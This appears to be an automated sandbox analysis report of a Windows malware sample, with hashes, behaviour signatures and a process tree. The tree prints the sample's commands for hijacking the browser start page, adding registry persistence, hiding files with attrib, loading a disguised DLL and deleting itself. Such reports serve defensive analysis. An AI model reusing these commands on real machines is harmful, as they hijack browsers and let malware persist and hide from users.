Analysis

  • max time kernel
    147s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
  • submitted
    26/07/2024, 13:23

General

  • Target

    743c70dc9d04d9b39f681a13658a3953_JaffaCakes118.exe

  • Size

    59KB

  • MD5

    743c70dc9d04d9b39f681a13658a3953

  • SHA1

    22379799d963acd5a88707518bb798965e3cab3e

  • SHA256

    0765299e68651128f2edf3a3f849ce4d38ee4982a81379890cd3e129a9fe92e5

  • SHA512

    8b877f07e1878e0d491f3a65585c8ce410fa31561f47b92d0203ff6de19fa0d6d877294d34bd31ea43fcfe67da3db429cfa587f082c59d953df27938f4a8046f

  • SSDEEP

    1536:gS9sf3ewWNlLC+U1xf4Trnm4GDvJO7kEy:gS9sfuwqBU1B4TrmBOAh

Malware Config

Signatures

  • Sets file to hidden 1 TTPs 2 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Drops file in Program Files directory 15 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 20 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies Internet Explorer start page 1 TTPs 2 IoCs
  • Modifies registry class 9 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\743c70dc9d04d9b39f681a13658a3953_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\743c70dc9d04d9b39f681a13658a3953_JaffaCakes118.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3012
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\xcodewget2.bat" "
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:788
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /K C:\PROGRA~1\FREERA~1\1.bat
        3⤵
        • Drops file in Program Files directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2536
        • C:\PROGRA~1\INTERN~1\iexplore.exe
          C:\PROGRA~1\INTERN~1\IEXPLORE.EXE http://WWw.cnkankan.com/?82133
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:2924
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2924 CREDAT:275457 /prefetch:2
            5⤵
            • System Location Discovery: System Language Discovery
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:1280
        • C:\Windows\SysWOW64\rundll32.exe
          rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 C:\PROGRA~1\FREERA~1\1.inf
          4⤵
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          PID:2900
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /K C:\PROGRA~1\FREERA~1\2.bat
          4⤵
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2600
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d ""http://www.82133.com/?o"" /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Modifies Internet Explorer settings
            • Modifies Internet Explorer start page
            PID:1976
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d ""http://www.82133.com/?o"" /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Modifies Internet Explorer settings
            • Modifies Internet Explorer start page
            PID:3044
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\Software\tmp" /v "key" /d ""http://www.82133.com/?o"" /f
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2036
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCR\CLSID\{971C5380-92A0-5A69-B3EE-C3002B33309E}" /v "IsShortCut" /d "" /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            PID:1904
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCR\CLSID\{971C5380-92A0-5A69-B3EE-C3002B33309E}\Shell\open(&H)\Command" /v "" /d "wscript -e:vbs ""C:\PROGRA~1\FREERA~1\3.bat""" /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            PID:2296
          • C:\Windows\SysWOW64\attrib.exe
            attrib +s +h C:\PROGRA~1\FREERA~1\tmp\a.{971C5380-92A0-5A69-B3EE-C3002B33309E}
            5⤵
            • Sets file to hidden
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            • Views/modifies file attributes
            PID:2172
          • C:\Windows\SysWOW64\attrib.exe
            attrib +s +h C:\PROGRA~1\FREERA~1\tmp
            5⤵
            • Sets file to hidden
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            • Views/modifies file attributes
            PID:1456
          • C:\Windows\SysWOW64\rundll32.exe
            rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 C:\PROGRA~1\FREERA~1\2.inf
            5⤵
            • Adds Run key to start application
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:1808
            • C:\Windows\SysWOW64\runonce.exe
              "C:\Windows\system32\runonce.exe" -r
              6⤵
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              PID:1964
              • C:\Windows\SysWOW64\grpconv.exe
                "C:\Windows\System32\grpconv.exe" -o
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2436
          • C:\Windows\SysWOW64\rundll32.exe
            rundll32 D:\VolumeDH\jni.mp3,MainLoad
            5⤵
            • System Location Discovery: System Language Discovery
            PID:672
    • C:\Users\Admin\AppData\Local\Temp\inl81FE.tmp
      C:\Users\Admin\AppData\Local\Temp\inl81FE.tmp
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:1140
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\inl81FE.tmp > nul
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2348
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\743C70~1.EXE > nul
      2⤵
      • Deletes itself
      • System Location Discovery: System Language Discovery
      PID:572

Network

MITRE ATT&CK Enterprise v15

Downloads
